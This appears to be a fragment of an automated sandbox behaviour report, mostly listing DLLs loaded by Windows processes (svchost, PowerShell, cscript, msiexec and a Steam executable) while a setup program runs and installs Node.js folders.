                        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\where.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: powrprof.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: umpdc.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: devobj.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: ffmpeg.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dbghelp.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dwrite.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dbgcore.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: powrprof.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: umpdc.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: kbdus.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: windows.ui.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: windowmanagementapi.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: inputhost.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: wtsapi32.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: winsta.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: mmdevapi.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: devobj.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: mscms.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: coloradapterclient.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: duser.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: atlthunk.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: textshaping.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: version.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: ffmpeg.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dbghelp.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dwrite.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dbgcore.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: powrprof.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: umpdc.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dxgi.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: mf.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: mfplat.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: rtworkq.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dwmapi.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: version.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: ffmpeg.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dbghelp.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dwrite.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dbgcore.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: powrprof.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: umpdc.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: kbdus.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: linkinfo.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ntshrui.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: cscapi.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: activeds.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: adsldpc.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: logoncli.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: activeds.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: adsldpc.dll
                        Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\corepack
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\corepack.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\install_tools.bat
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node.exe
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\nodevars.bat
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\npm.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\npx
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\npx.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack
